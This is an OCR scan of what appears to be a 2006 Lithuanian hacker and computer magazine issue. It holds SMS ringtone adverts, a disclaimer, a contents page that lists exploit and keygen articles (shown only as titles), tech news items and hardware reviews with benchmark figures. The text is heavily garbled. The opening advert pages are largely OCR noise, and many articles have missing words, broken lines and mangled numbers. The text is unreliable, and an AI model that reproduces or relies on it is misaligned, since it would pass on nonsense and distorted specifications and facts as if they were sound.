— M ancia R 1. 


Ta ticiikų 


[ Dima Bilan * Never Let You Go 218439 
a Lordi * Hard Rock Hallelujah 218458 

Vilija * Mylėk 206288 
Rask lobį kartu su Karibų piratai IA. Rimiškis * Kartais būna 214389 
Rašyk SMS: HA JAVA 225512 “ | 5) LT United * We Are The Winners  |218462 | 
Siųsk numeri 69 danguje * Devintam danguj | 216344 | 


ra SS GE NaT Raketa * Dolce Gabana 216342 
i Flipsyde * Happy Birthday 201844 
Ni „69 Danguje " Vasara 162209 
a 006 FIFA World Cup * Goleo 221326 
A SUPER MELODIJŲ NAUJIENOS | 
Rašyk SMS: HA JAVA 210015 Bumer 2* Osen 221626 
Siu numeju JaES lol Paris Hilton * Stars Are Blind 219247 
R.H.C.B. * Dani California 218933 
ien S "Nelly Furtado * Maneater. 218637 
al aaa A. Rimiškis * O kam sava. 209482 
SEL * Parašyk man laišką iš Paryž.. | 222314 
Vudis * Išsimiegok 222317 
Rašyk SMS: HA JAVA 225505 Yva * Apie meilę 222313 
pnkrineis 1854 101 2 A. Mamontovas * Viskas iš naujo |222420 i 
(E Sel ft. Mia * Muzika 211815 
t 69 Danguje * Super mergaitės 222321 
i "Mango * Ėjom 212324 
L "Biplan “Šok ir nesustok 173759 


SUPER MELODIJŲ REKOMENDACIJA 


Rašyk SMS:HAJAVA 225471 4 a 
Iųsk | Shakira/W.Jean * Hips Dont Lie |213723 


Siųsk numeriu: 1354 


22 Eminem/Nate Dogg * Shake That |201846 
1 „Gnarls Barkley * Crazy 211667 Į 
„Dima Bilan * Eto bila liubov 222323 | 
"Flipsyde * Trumpets 210363 | 
Tyla [kai ko nors nenori girdėti] |57532 
[Rob Sinclar * World, Hold On 214526 


Rašyk SMS: HA JAVA 225510 


Siųsk numeriu: 1354 SUPER KREPŠINIO MELODIJOS 


| 6)LT UNITED We are the Winners T 216467 || 
(Marijonas * Laikas būti pirmiems 218216 


6) GAG * Pasaka apie du brolius 160779 
IOueen * We are the champions 118076 | 


Rašyk SMS: HA JAVA 222462 Vien t 

Siųsknumeriu:1354 10 Lt OW| (4) Žas * Ant kalno mūrai 38260 
ATA RENIS Eu 2 223565 > 

sri a ua a ES Lietuvos respublikos himnas 33087 


a 


a I KAIP | 

2 į (AUTI PAVEIKSLIUKĄ? 2 Lt „M a 

Eik“ akių IG) Žas * Mes laimėsim 31892 
| 


T 

ELTYSĄ 
AO = 
0 


- Rašyk SMS: HA WALL kodas 


- NN pvz.: HAWALL 219363 Siųsk numeriu: 13 
Artu pasiruošęs krepšinio čempionatui? a 00 PAC o Ši draugui: HA WALL kodas pik SUPER MELODIJOS NESENSTA 
Rašyk SMS: HA JAVA 219620 O = Take That * Back For Good 208729 
42 numeriu: 1354 10Lt S Sex Pistols * Anarchy In The UK 206151 
ETO Ni epe kn Neo a nan sanis, S] Madonna * Hung Ūp 182253 
Vs Ve Samsung 100 E700E710 540510 800, 851060, 00 
ia soiz1o Sensa Ca Gas Veka 948 05 swa 50. są AC/DC * Back In Black 12073 
p. Kn g r i a a jaja VT Naujieji Lietuviai * Afigenai 173767 
Boney M * Daddy Cool 21321 


Rašyk žinus: NA L TUSCIAS 
Siųsk numeriui 352 


MG] POLI melodija - rašyk SMS: HA SUPER kodas 
pvz; HASUPER 219363, Susk numeriu: 
AA Šiųsk draugui: HA SUPER kodas 3706XXXXXXX 
Nono meločija: HAM kodas Siųsk numeriu: 


Rašyk SMS: HA KMI ūgis svoris 
Pvz.: HA KMI 186 76 
Siųsk numeriu: 1352 


WAP nustatyma 


Pafenins melodijos nk: Nk: vilemi Je Telonas Samsung: 0500. E7U0,E7 1, 
P440 PS10 SON, SG4.E330, 00,1, as) 46. T100 V200 XI 
C60, C62,CF62,CVES,OJG5,CK7O NSS, 


y AP parametrai Asia paramtius 
J sutanfgarvos AP" Noks r Son Erkson el 
E, SS Ir TELE2 (skys MAŽYLIO nose 

ip GPRSWAP Sis numeri 1352 2u 


HAPOZA im nuo Tiki 100 
a: MAPOTAS, 
Šiskmumens1282 


Labas, mono vardas: Donatos32 
D mano cigOnšl3, no, Ir kos? 


Iių situacijų opslu ne tik internete, bet ir reoliame gyvenime. Žmonės taip dažnai 


lokius pačiu pravardės, jog kartais skambindamas vieram Tad 


balsą. Ką daryti? 


Ogi Lakers: nebūtų hakeris, jei is bet kada negalėtų pa " 
a tome, jog: žmonės Šiaip ar taip panošius daiktus laik drug 
1 je skiria margarino ir sviesto skonį?! Koks skitumas — CD ar DVD — įsigu tame 
is p ielpa filmas arba“ naujausias: muzios albumas?! Kla: vertus, 
teikia juk ka nos daryti, kad veną diena Visai nepo ašios informacijos liūn 


ieso? It čia padžti gali ik seno paytuso hakerio kaip aš išminti 


k. ralių vadų duomenų archyvų 
eilę. Tada įie negalėtų rinkis 


Nano  proaktas = siūlau sudaryti tiek inernetnių 


norintys: Užregistruoti naują vardą, tu 


kio: pai do lol, kal iptu jo galiojimas ki hgui su tuo vardu. Nehūtų jokių 
Donata: 00, Donatas999 ir net Doncė. Ko ą? Ogi aišku, kad 
Keiai. Gol patys Tiktiausi hakeriai netgi šio A ima. pakeistų iš 
Hokeis“ į 0“. Žinai, kodėl 

pėk, kelinti mūsų žurnalo numeri 
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Bet kokių programinė įrangą, patarimus ar kitą 
informaciją naudojate SAVO PATIES RIZIKA 

ir tik JŪS VIENINTELIS atsakote 

už bet kokią žalą, padarytą kompiuterinei siste- 
mai, visuomenei ar savo paties gerovei. 


Redakcijos nuomonė 
nebūtinai sutampa su 
tekstų autorių nuomone. 
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NAUJIENOS 


SAMSUNG HD400LJ 
NAUJA MSI „MAMA“ PRIE TAVO DURŲ 


VISAGALIS ADMINAS 


1BM ISTORIJA 


FAO 

EKSPLOITŲ APŽVALGA 
RUOŠIAM KEYGENĄ. 
PADARYTA VYRIAUSYBĖ 
ASILIUKUI — ASILO MIRTIS 


BESTUBURIŲ GYVENIMAS 
IR MIRTIS SISTEMOJE 


PATS SAU ANTIVIRUSAS 
WIETSE VENEMA 


VIRTUALIZACIJOS MENAS 
TAUPOME PINIGUS SU „TUKSU“ 
SPĄSTAI KAPRIZINGOMS PROGRAMOMS 


UNIVERSALUS IŠPAKUOTUVAS 


HACKNEWS A 


„LA MARTINIERE“ PRIES „GOOGLE“ 


Google toliau dirba liaudies labui, tačiau 
vis tiek atsiranda piktų žmonių, kurie 
nevertina šios kompanijos pastangų. 
Maža to, jie liaudies numylėtinius 
paduoda į teismą, kaip kad pasielgė 
„La Martiniere“ — prancūzų leidykla, 
apkaltinusi Google autorinių teisių 
pažeidimu. Kaip tu jau tikriausiai 
žinai, vienas Iš paieškos kompanijos 
skyrių užsiima keliose stambiausi- 
ose pasaulio bibliotekose saugomų 
knygų skaitmenizavimu. Tačiau pagal 
įstatymą tai galima daryti tik gavus 
leidyklų leidimą, o Google tokio Iei- 
dimo neprašo. Iki neseno laiko knygų 
skaitmenizavimo projektas sukeldavo tik tokių organizacijų, kaip 
Association of American University Presses, kritiką. tačiau dabar 
Google taip lengvai neatsipirks. Kompanija tikina skaitmenizuojanti 
išskirtinai tik senas knygas (autorių jau seniai nėra tarp gyvųjų, be 
to, visa tai daroma ne dėl pelno, o siekiant išsaugoti žinias ateities 
kartoms). Pažiūrėsim, ką pasakys teismas. 


HITECHNEWS A 


MODELIUKAI IŠ ATOMŲ 


Nanostruktūrų modeliavimas — sudėtinga, specialios programinės 
s reikalaujanti užduotis. Nepaisant to, mokslininkai toliau ku- 
ria ir modeliuoja įvairias molekulines atsargines dalis. Taig| neseniai 
kompanijos „NanoREX“ mokslininkai sugebėjo programų komplekse 
nanoENGINEER-1 sukurti universalaus šamyro modelį, kurį dar 1992 
metais suprojektavo Erikas Dreksleris Ir Ralfas Merkle. Tyrinėtojams 
pavyko parodyti šamnyro veikimo dinamiką, o panaudojus modeliavimo 
rezultatus buvo nustatyta, kad abi šamyro alkūnės vienas kito atžvilgiu 
galiišsilenkti iki 20 laipsnių. Tuo pačiu šamyro dalys neturi sąlyčio taškų! 
Jos išsilenkia per cheminius ryšius, kurie ir laiko dvi mechanizmo dalis. 
Panaudojus tyrimo rezultatus, buvo sukurta šamyro darbo animacija, 
kurioje jis išsilenkia iki 40 laipsnių. Šamyro išsilenkimo dažnis — 100 
Hz. Įrenginys susideda iš 3846 atomų, jo ilgis — 6,4 nanometro, plotis 
ir aukštis — 3,8 nm. Šis modelis — vienas iš bandymų sukurti mašiną 
apskrita be besitrinančių dalių. Dabar mokslininkai planuoja sumod- 
eliuoti šį mechanizmą kartu su jau tau žinomu molekuliniu automobiliu ir 
taip su centriniu varikliu priversti judėti keleta ratų. Kas bus toliau, jeigu 
prie automobilių bus prijungtas dar ir nedidelis kompiuteris! 


[| 
| 
| 


HITECHNEWS A 


BAKTERIJA | 
KIBERNETINĖJE ERDVĖJE 


kterija E.Coli — kol ke 
mikroskopu. 
Viename ankstesnių mūsų numerių tu jau galėjai pamatyti, 
kaip mokslininkai pirmą kartą skaitmenizavo virusą. Dabar jie 
ėmėsi žarnyno lazdelės — bakterijos E.Coli. Mokslininkai nori 
ją ne tik sumodeliuoti, tačiau ir sukurti „realią“ aplinką, kurioje 
lėtų gyventi. Tuomet bus galima studijuoti ne tik [azdel 
biochemiją, bet ir realiu laiku skaitmenizuoti genų darbą. „ 
tik įsivaizduokit, jog galite sėsti prie kompiuterio ir su gyvūnais 
atlikti įvairius eksperimentus bei stebėti, kaip ir kas veikia, tuo 
pačiu išsiaiškinant, kodėl įvyko viena, o kita — ne“, — pasakoja 
kanadiečių profesorius Maiklas Elisonas, Albertos universiteto 
biologas. Mes negalėsime biologijoje padaryti revoliucijos, 
kol neišmoksime modeliuoti gyvo organizmo“. 
Šioje srityje sėkmė mokslininkams nusišypsojo tik prieš 
keletą metų, o kada pavyks pasiekti kokių nors rezultatų 
galima tik spėlioti. Ir įvertink tai, kad mokslininkai 
užsimojo ištyrinėti viso labo patį kukliausią žmogaus žarnyno 
gyventoją, kurio sandara ganėtinai paprasta. Daktaras 
Elisonas E.Coli, kaip vieno iš mokslininkų mėgiamiausių 
biologiniams eksperimentams skirtų modelių, pasirinkimą 
aiškina taip: „Mes paėmėme patį paprasčiausią organizm. 
apie kurį žinoma daugiausiai“. Taigi iškėlus tikslą skait 
menizuoti bakteriją, 2002 metų gruodį buvo suformuotas 
Tarptautinis aljansas (IECA — International E. coli Allian 


I šią organizaciją įėjo kanadiečiai iš Cybercell projekto, 
Japonai iš pirmaujančių biologinių Mokslų in: 


tituto, anglai iš 
IEBC grupės, amerikiečiai iš E.Coli konsorciumo, farmacijos 
kompanija „GlaxoSmithkline“ ir daugelis kitų. 
Aljansas paskirstė užduotį laboratorijoms ir prasidėjo projektų 
dinim, kuomet skirtingų šalių mokslininkai apjungia 
avo jėgas. „Net jeigu mes šiandien sugebėtumėme sukurti 
visos bakterijos modelį, tai nereikštų, kad mes galėtume su- 
prasti tai, kas sukurta, — prideda Teris Emonetas iš Čikagos 
universiteto. Esmė čia tame, kad mes turime viską daryti 
žingsnis po žingsnio, iš eilės tikrindami ir studijuodami visus 
reiškinius“. Tokiais tempais po dešimt metų prieisim ir iki savę 
skaitnenizavimo. 


HACKNEWS A 


„MICROSOFT“ 
PERAUKLĖJO SPAMERĮ 


„Dabar tikrai galiu sakyti: aš praregėjau! Supratau, kad spa. 
— tai blogis, ir su juo reikia kovoti. O juk dar neseniai 
rtinau, kaip į katės ir pelės žaidimą, tačiau bendr. 

ponu prokuroru, ponu tyrėju ir misteriu teisėju man par 

mano anksti minčių absurdą. 


Taip, mano draugai, aš užsirašiau 
savanoriu į antispamerių judėjim. 

Pasakykime ryžtingą NE spamui! 
Mirtis spameriams!“ — maždaug 
tokio turinio tekstą savo web bl- 
oge neseniai išpublikavo 2 


metų 
ksasietis Rajenas Pitiliakas, kuris 
ekspertų nuomone buvo vienas iš 5 
aktyviausių pasaulio spamerių. Savo 
karjeros viršūnėje Rajenas per dieną 
usdavo iki 25 milijonų laiškų! Kas 
padėjo jam praregėti? Viskas pa- 
icrosoft“ karas prieš spamą 
nė šio jauno žmogaus areštą, ošis, 

lamas išvengti ilgų metų už grotų, su kompanija pasirašė 

taikos susit: ą, kuris jam kainavo milijoną dolerių. Tačiau tai jo 

o nuo bendravimo su šauniąja valstijos policija, o ten, 

/ti, tokių herojų nemėgsta. Dabar buvęs spam: 
laiko antispameriu aktyvistu ir žada iš paskutiniųjų 
oti su tokiais, koks kažkada buvo jis pats. 


KINIJA PO „LINUX“ VĖLIAVA 


2005 metų pabaigoje kinų vyriausybė 
paskelbė, kad planuoja ketvirčiu 
sumažinti iš „Microsoft“ perkamos 
programinės įrangos. Šių metų 
birželį kinai kardinaliai ėmėsi šio 
klausimo sprendimo. Tekančios 
aulės šalis nusprendė visiškai 
atsisakyti dėdės Bilo laugų ir 
visuose kinų kompiuteriuose įdiegti 
Linux OS, Taip planuojama padaryti 
bent jau su tais kompiuteriais, kurie 
veikia vyriausybinėse ir valstybinėse 
įstaigose. „Tai globali tendencija. 
Linux pigi sistema, jo adaptacijos 
laipsnis taip pat aukštas taip 
viršūnių sprendimą pakomentavo 
Maikas Linas, kompanijos „Taipei Computer Association“ kon: 
sultantas. „Microsoft“ teliko skėstelėti rankomis: „Pirkėjai patys 
enkasi tai, ko jiems reikia“. Nepaisant to, su Kinijos vyriausybe 

nka toli gražu ne visi. Pavyzdžiui, stambiausias šios šalies AK 
gamintojas, kompanija „Lenovo“, planuoja ir toliau bendradarbiauti 
su „Microsoft“ bei į visus kompiuterius įdieginėti Windows sistemą. 
Ekspertai mano, kad jeigu „Lenovo“ laikysis savo pozicijos, jos 
Konkurentai „Dell“ ir HP užims dalį rinkos, o tai reiškia, kad atims ir 
dalį pelno. Be to, nėra žinoma, kaip į tai reaguos Kinijos preziden- 
tas ir ministrai, — šios tautos atstovai garsėja savo kardinaliomis 
priemonėmis prieš „teisingo režimo drumstėjus“. 


HARDNEWS A 


ŽAIDŽIAME SU ACME 


Mes negalime gyventi be 
kompiuterinių žaidimų! O ar gali 
būti kitaip, jei Acme už juokingai 
mažą kainą siūlo ir nepriekaištingus 
priedus. Visų pirma pakalbėsime 
apie vairasvirtę 4 krypčių ir 8 
mygtukų priedas dovanoja realų 
pojūtį, kadangi jame slepiasi 
vibruojantis mechanizmas. Toks 
pat vibracijos modulis yra ir vaire. 
USB 1.1 ir 2.0 jungties reikalaujanti 
vairasvirtė neprašo didelių kompiuterio gabumų, 
todėl tai puiki žinia tiems, kurie neturi itin galingų kompiuterių. 
Vairas taip pat ne paprastas — force feedback turintis valdymo 
prietaisas puikuojasi net 12 mygtukų, 0 automatinio veikimo 
mygtukai ir net 270 laipsnių sukinėjamas vairas, kurio 
įstrižainė net 28 cm, nenori likti vieni prie kompiu: 
terio, kai eini miegoti. Būtent todėl į jų draugiją 
atskuba akceleratoriaus ir stabdžių pedalai, ku: 
riuose taip pat yra vibruojantys mechanizm: 
Guminės medžiagos vairo sutvirtinimai neleidžia 
jam išslysti iš rankų, kai nori įveikti vieną iš 
svarbiausių posūkių, lenktynėse kovodamas 
dėl pirmos vietos... Acme žaidimams suteikia 
naujų spalvų: ACME joystick F880 kainuoja 
33Lt, o ACME F297 vairas - 190 Lt. www. 
acmemedia.lt 
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HACKNEWS A 


PO NSA PADU 


Ne paslaptis, kad JAV Nacionalinė saugumo agentūra turi didžiulę 
amerikiečių duomenų bazę ir ne tik. Telefonai, adresai, socialinio 
draudimo numeriai, teistumai ir net ypatingosios žymės. Bet NSAi 
to pasirodė maža, todėl vaikinai nusprendė praplėsti šį lobyną. O 
kaip tai geriausia padaryti? Teisingai, keliauti į internetą. Juk liaudis 
tinkle ant kiekvieno kampo apie save palieka įvairių naudingų 
duomenų. Ko vertos vien pažinčių svetainės ir web blogai. Be abejo, 
jeigu visą šį gėrį bandytum filtruoti rankiniu būdu, tai neužtektų 
sveikatos, todėl agentūra dabar užsiima greito duomenų surinkimo 
pagal tam tikrus parametrus technologijos kūrimu. Šios pasakos 
moralas toks: žiūrėk, ką rašai, nes Didysis Brolis nesnaudžia 
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HITECHNEWS A 


PIRMASIS 
POLIMORFINIS ROBOTAS 


Tau tikriausiai ir taip aišku, kam reikalingas daugiafunkcinis blo- 
kinis robotas. Apie juos buvo daug rašyta, buvo demonstruojami 
jų prototipai. Bet dabar galima visiškai užtikrintai sakyti, kad 
Jau sukurtas pirmasis polimorfinis robotas. Jį sukūrė Pietų Kali- 
fomijos universitete (USC) dirbantis profesorius Vei Min Senas. 
Mašina pavadinta kukliai — SuperBot. SuperBot biudžetas nei 
didelis, nei mažas — 8 milijonai dolerių. Pagrindinis rėmėjas yra 
NASA, kadangi robotas orientuojamas kosmoso tyrinėjimams. 
SuperBot buvo kuriamas kaip modulinis, daugiafunkcinis ir 
perkonfigūruojamas robotas. Teoriškai jis gali šliaužti kaip gyvatė ar 
vikšrelis, pavirsti į ratą, taip pat suformuoti ranką-manipuliatorių, 
tapti mašina-alpinistu, kad galėtų nusileisti į kraterį, ir net būti 
mobilia platforma. Sukurti tokį lankstų robotą leido autonominiai, 
intelektualūs ir savaime perkonfigūruojami moduliai, kurie ir yra 
visos temos pagrindas. Atskirai paimtas modulis, kuriame yra 


įmontuoti 2 elektriniai varikliukai ir kompiuterinė mikroschema, 
gali savarankiškai judėti ir persiversti. Vienas su kitu moduliai 
gali susijungti keturiose skirtingose vietose. Desertui gamintojai 


ketina pademonstruoti vieno modulio sugebėjimą skraidyti mikro- 
gravitacijos sąlygomis. 


naujo daug žadančio projekto, kurį finansuoja 
bė stambių kompiuterinių kompanijų ir organizacijų, tokių, 
p „France Telecom“, „Polish Telecom“, „IBM Research“ ir kt., 
>talės Projektas vadinasi Diadem Firewall, tai yra aparatinė ap- 
nuo DDOS atakų, orientuota pagrinde į plačiajuosčio inter- 
neto tiekėjus. „Diadema“ montuojama tarp tinklo ir ryšio tiekėjo, 
klo srautas filtruojamas iš visų prijungtų kompiuterių. Jeigu 
sienė aptinka kokiu yklių pažeidimus 
kėtas tinklo srauto augimas), tai šis kompiuteris yra tuojau 
blokuojamas. Toks metodas Įeis pristabdyti arba net sustab- 
dyti kompiuterių-zombių inicijuojamas atakas. Diadem Firewall 
sukūrimui buvo išleista beveik 4 milijonai dolerių, dabar darbai 
ai baigti. Apsaugos paketo testavimą planuojama pradėti 
2006 metų rugsėjį, o pristatymas įvyks Prancūzijoje ir Lenkijoje. 


HARDNEWS A 


NAUJASIS IRIVER GROTUVAS 


Rinkoje pasirodė kompanijos IRIVER 
naujovė — grotuvas N12. Kartu su 
juo pateikiamos ir specialios ausinės, 
kurios atitinka visą įrenginio įvaizdį: 
jų laidai nėra prailginti, tačiau sufor 
muoja uždarą ratą kaip karoliai, prie 
kurių vietoje pakabuko tvirtinamas 
pats grotuvas. Įrenginio stilingumą 


įtvirtina vienspalvis pusiau veidrodi 
nis OLED ekranas su 16 atspalvių, ant juodo korpuso įmontuc 
Swarovski kristalas ir originali „ekrano užsklanda“ su firminiu 


Šokančiu žmogiuku. 
kiek nenukentėjo: 1 Gb atminties, galimi MP3 


Beje, grotuvo funkcionalumas nuo to r 
WMA, ASF ir 0G 


Vorbis formatai, ekvalaizeris, 3D garso sistema, signalo/triukšmo 
santykis — 90 dB, maksimalus galingumas — 14 mW kanalu 

Be viso šito grotuvas turi laikrodį, žadintuvą, radiją ir diktofoną. 
Grotuvo gabaritai 7,2448,813,3 mm, svoris su akumulia 
toriumi — 23 g, o veikimo laikas — 13 valandų. Įrenginį galima 


įsigyti už 200 dolerių 


„BLU-RAY“ IŠ TDK 


Kol megakorporacijos ginčijasi, koks optinių įrengini 
taps standartu ir kieno gaminiai taps jų pagrindu, kom 
pradėjo tiekti Blu-Ray (BR) diskus. | juos ramiai galim 


rmatas 
anija TDK 


a įrašinėti 


ypač didelės kokybės Hi Definition (1920x1080) filmus st 
kuris, laimei, išvengė kompresijos. Siuo metu galima į 
talpos diskų. Jie skiriasi savo formatais: į BR-R inform 
o BR-RE suteikia perrašymo galimybę. 
72 Mb/s. Tokie rezultatai pasiekiami prita 
įtešantį sluoksnį CUSi (varis ir silicis). Be to, šie diskai turi padidintą 
atsparumą Ultravioletinių spindulių poveikiui, o firmine DURABIS2 
danga apsaugos gaminį nuo įbrėžimų ir taršos. Be to, šie daikčiukai 


išlaiko 10000 perra: 


BEKELEI SKIRTA „ 
LOGITECH“ PELĖ 


Džipas nuo įprastinės mašinos 
skiriasi savo patikimumu, galia ir 
pravažumu, o važiavimo komfortas 
dažnai lieka antroje vietoje. Jeigu sukurtume analogiją, tai nauja 
kompanijos „Logitech“ pelė panaši į labai brangią bekelės trans- 
porto priemonę: ji veikia bet kokiomis sąlygomis, tuo pačiu yra 
labai ergonomiška, dėl ko ji yra puikus sprendimas mobiliems 
vartotojams. Dvigubo lazerinio sekimo technologija Ieidžia pelei 
dirbti praktiškai ant bet kokių paviršių. Įrenginio korpusas ap- 


mo ciklų 


saugotas nuo smūgių, o prie USB jungiamą imtuvą (pelė belaidė, 
veikia 2,4 GHz dažniu ir iki 9 m atstumu nuo kompiuterio) galima 
paslėpti korpuso viduje. Įrenginys turi prasukimo ratuką Logitech 
Tilt Wheel Plus Zoom, kuris vartotojams leidžia lengvai ir pa- 


prastai prasukinėti ekraną žemyn-aukštyn bei kairėn-dešinėn, 
taip pat didinti ir mažinti skaitmeninių nuotraukų, web puslapių 
ir dokumentų dydį. Be to, pelė veikia su viena AA tipo baterij 
0 ant korpuso sumontuotas jos įkrovimo lygio indikatorius. Pelę 
galima įsigyti už mažiau nei 100 dolerių. 


HARDNEWS A 


ORANŽINIS PLIUSAS 
MOKO ISPANŲ KALBOS 


Apacer Audio Steno AU822 | Pasiro- 
dys 2006 m. rudenį 
WWww.apacer.com 
MP3 grotuvai tokie populiarūs, jog jų 
pradeda prireikti netgi tiems, kurie, 
atrodo, nėra potencialūs šių produktų 
vartotojai. Pavyzdžiui, visai neseniai 
išgirdau komentarą iš savo močiu 
kuriai, pasirodo, reikia MP3 grotuvo 
tam, kad galėtų klausytis E. Kučinsko 
dainų pakeliui į sodą. Kur ritasi pasau- 
Atiduok savo buvusį MP3 grotuvą 
močiutei ir ieškok kito — juk nepriversi 
jos laukti, kol surasi ir nupirksi jai 
tiesa? Tuo labiau, jog tu tikrai 
si šį Apacer pirmosios akistatos 
tu. Didžiulis 1,5 colių įstrižainės 
CSTN 65K spalvotas ekranas puikiai 
atgamina filmų ir nuotraukų sį 
Tai ypatingai plonas ir solidus MP3 
grotuvas, kurio centr 
dizaino elementas - oranžinis pliusas 
karto „kabina“ ne vieną, todėl paskubėk užsirezervuoti 
Ą vargu ar jų liks po pirmosios siuntos nusileidimo 
rduotuvės sandėlyje. < jame be visa ko yra ir FM radijas su 
įrašinėjimo funkcija ir r ienio kalbų instruktažas (kai tau reikia 
pakartoti išgirstus nio kalba)! 


Taip, jis i 


DAR KARTELĮ ASMENINIS KOM- 
PIUTERIS 


HP Pavilion dv6003ea | 3200 Lt 
Www.hp.com 


Mums labai patiko HP reklaminis šūkis, kuriame teigiama, jog 
oiuteris vėl tampa asmeniniu. Juk taip ir yra iš tikrųjų - bent 
naujieji HP nešiojamų kompiuterių modeliai daro viską, kad 
tereiktų vieno mygtuko pagalba sutvarkyti visos dienos 
us, Kaip tai įmanoma? Su šiuo geliūnu viskas įmanoma. Dalis 
echnikos šedevrų, kurie slypi po dailučiu korpusu + 512 MB RAM 
atminties, AMD Turion 64 procesorius, 80 GB talpos kietasis 
kas, NVIDIA GeForce Go 7200 vaizdo korta ir 802.11a/b/g WLAN 
ndartas. Tai toli gražu ne viskas. Plika akimi pastebime ir dar 
leną šaunų dalyką — 15,4 coliu įstrižainės WXGA aukštos raiškos 
BrightView tipo plačiaekranį ekraną, kuriam nuotaiką pradžiugina 
internetinė kamera su integruotu mikrofonu. Visokių tipų DVD 
ašinėjantis diskasukis tarsi užsimena, jog muzika ir filmai čia tikrai 
laukiame svečiai, tačiau kai pamatai, jog prie laptopo pridėtas ir 
firminis HP nuotolinio valdymo pulte- 
lis, supranti, jog su kompiuteriu 
nesiskirsi ir po darbo. Na ir kaip gi 
jis gali netapti vėl asmeniniu, kai HP 

viską daro nepriekaištingai?! 


HARDNEWS A 


DISKUS KEIČIA FLASH'AI 


Intenso USB Drive | Pasirodys 2006 m. rugsėjo mėn 
ww.intenso.de 
Įdomu, ar kompanija In- 
tenso keičia veiklos kryptį, 
ar tiesiog prisitaiko prie 
aplinkos pokyčių. Bet ku- 
riuo atveju, tai sveikin- 
tina - kompaktinių diskų 
novatorė ir gamybos lyderė 
vokiečių kompanija Intenso 
anksčiau mūsų duomenis 
saugoti siūlė DVD arba 
CD laikmenose, tačiau 
trenkė žaibas į medį ir 
firma pradėjo gaminti USB 
„atmintines“. Šie USB 
rakteliai“ yra labai maži 
ir patogūs nešiotis, tačiau 
svarbiausia — kokybiški. 
Pasirink norimą talpą 
256ar512MB; 1ar2 GB 
ir pasidaryk svarbiausių dainų, filmų, nuotraukų ar dokumentų 
kopijas, kurias nuolatos turėsi prie savęs. Neturi vietos diskui 
(žinoma, tik su Intenso vardu) - pasiimk raktą (su tokiu pat vardu). 
Kam mėtytis į šonus — sykį likai patenkintas ar net nudžiugintas 
Intenso produktu, nerizikuok savo nuotaika ir toliau 


(Intenso) 


USB 168 


KIEK PLAČIAI 
GALI ISSKESTI RANKAS 


Samsung 940BW | 940 Lt 

WWww.samsung.com 

Aš nepasakosiu, kaip nusipirkau šį monitorių savo namams. Tikrai 
neminėsiu, jog prie laiptinės surengiau varžybas, kurio iš kaimynų 
pečiai plačiausi. Turbūt nuspėji pats, kad plačiaekranį monitorių 
paimti už šonų ne taip jau paprasta, taip? Juokauju. Čia gi Sam- 
sung- kompanija, kuri šalina sunkumus mūsų gyvenime, o ne juos 
kuria. Pasižiūrėk į šį gražuolį - taip, tai monitorius, o ne svetainėje 
vietos ieškantis televizorius. 19 colių įstrižainės plačiaekranis LCD 
monitorius sukuria net 1440x900 rezoliuciją, kurią palydi tokie 
pasiekimai kaip 4 ms reakcijos laikas (nuo pilkos iki pilkos), 500:1 
kontrastas ir 300 cdm ryškumas. 160 laipsnių matymo kar E 
istuoja tiek vertikalėje 
tiek horizoi ėje, 0 
D-SUB, DVI-D (HDCP) 
r net įmontuotas en- 
ergijos šaltinis sukuria 
visa kita, ko tau trūksta 
po to, kai atsipeikėji.. 

Juk jis buvo tave 
užhipnotizavęs kaip ir 
mus kelioms valan- 
doms savo išvaizda 
tiesa? 


010 


Samsung HD400LJ 

SAMSUNG SAVO NAUJĄ KIETŲJŲ DISKŲ 
SERIJĄ SPINPOINT T133S PAPILDĖ 400 
GB MODELIU. HD400DJ YRA SERIAL ATA 
II JUNGTIES KIETASIS DISKAS, KURIO 
PRALAIDUMAS SIEKIA 3 GB/S. DISKAS 
TURI 8 MB ATMINTIES BUFERĮ (SIŪLOMAS 
IR MODELIS SU 16 MB). DISKŲ SUKI- 
MOSI GREITIS 7200 APSISUKIMŲ PER 
MINUTĘ, VIDUTINIS PAIEŠKOS LAIKAS 
8,9 MS. KAUPIKLIS IŠLAIKO APKROVIMĄ 
IKI 63 GRAMŲ PER 2 MILISEKUNDES 
DARBINIAME REŽIME BEI IKI 300 


FERRUM 


SOFTWARE 


IMPLANT 


GRAMŲ PER 1 MILISEKUNDĘ BUDĖJIMO 
REŽIMĖ. VIDUTINIS TRIUK MO LYGIS 
DISKUI NUSKAITANT AR ĮRAŠANT YRA 
29 DB. 


HACK 


Naujame vinčesteryje įdiegta krūva 
firminių Samsung technologijų. 
NoiseGuard ir SilentSeek 
sistemos garantuoja žemą 
disko garsą, o technologi- 
ja Native Command Oueu- 
ing (NCO) leidžia kilstelti 
našumą, procesoriaus tei- 
kiamas užklausas sustatydama 
į eilę. Be to, reiktų paminėti 
saugumo priemones ATA Security 
Mode ir ATA Host Protected Area. 


8 
š Techniniai duomenys 
Talpa 400 GB 
Vidutinis: paieškos laikas 89 ms 
Vidutinis: vėlavimas. 4,17ms 
Buleris 8 MB 
Sukimosi greitis 7200 rpm 
; feno nuo Vieno Iekoli ont kilo laiks 0,8 15 
z Apsikeitimo tarp nešėjo ir valdiklio greitis 1000 Mbit/s 
= Galvulės [J 
8 Tiskų skaičius 3 
SMART Taip 
NTBF 600 tūks!. valandų 
Triukšmo lygis 27 dB budėjimo režime, 29 
dB darbiniame 
Sąsaja SATA-II (suderinama su 


SATA-I ar SATAI5O valdiklis) 


Sąsajos: pralaidumas 300 Ms 
5 Apimys (plots, aukštis, ilgis) 102 x 25 x 146 mm 
= Svoris 630 
2 


Testų rezultatai (su 
procesoriumi Athlon64/ 
4000) 


CT a 


Result Detais PEMARKS> 


os Rosuas | Log || 


FutureMak PCMaik 2005 
HDD — File Wite 
79,8 MB/s 


FutureMaik PŪMaik 2005 
HDD — Virus Scan 
739 MB/s 


FaturoMark PCHrk 2005 
HDD — Ganeral Usage 
58 MB 


FutureMark PCMork 2005 
HDD -— Application Loading 


G 
73 MB5 

FutureMūrk PCMark 2005 

HDD —— XP Siutup CT || A 
87 MO/s Result Detais PEMARK“ 


FutureMark PCMaik 2005 
HDD Benchllark 
5544 balai 


Iš GPU Tea Suo 
AP Neon Test Sio 
A) Graphies Tea Sute 


Returellak PCHaik 2004 
HDD Benchlhark 
5330 balai e 


HDD-TACH 2.61 
Vidutinis: nuskaitymo greitis 
64614 KB/ 


Pričjimas pie disko | Vidutinis įrašymo greitis 
153 ms 31641 KV/S 


ETTI (TTL 


amen | CES 


Caoyoi (198095 TCD Lab. Inc 


15 Bigos sveajo BAE142 


Nauja MSI „mama“ 
prie tavo durų 


NAUJAI PROCESORINEI JUNGČIAI 
AM2 NEBETRŪKSTA DĖMESIO. KOM- 
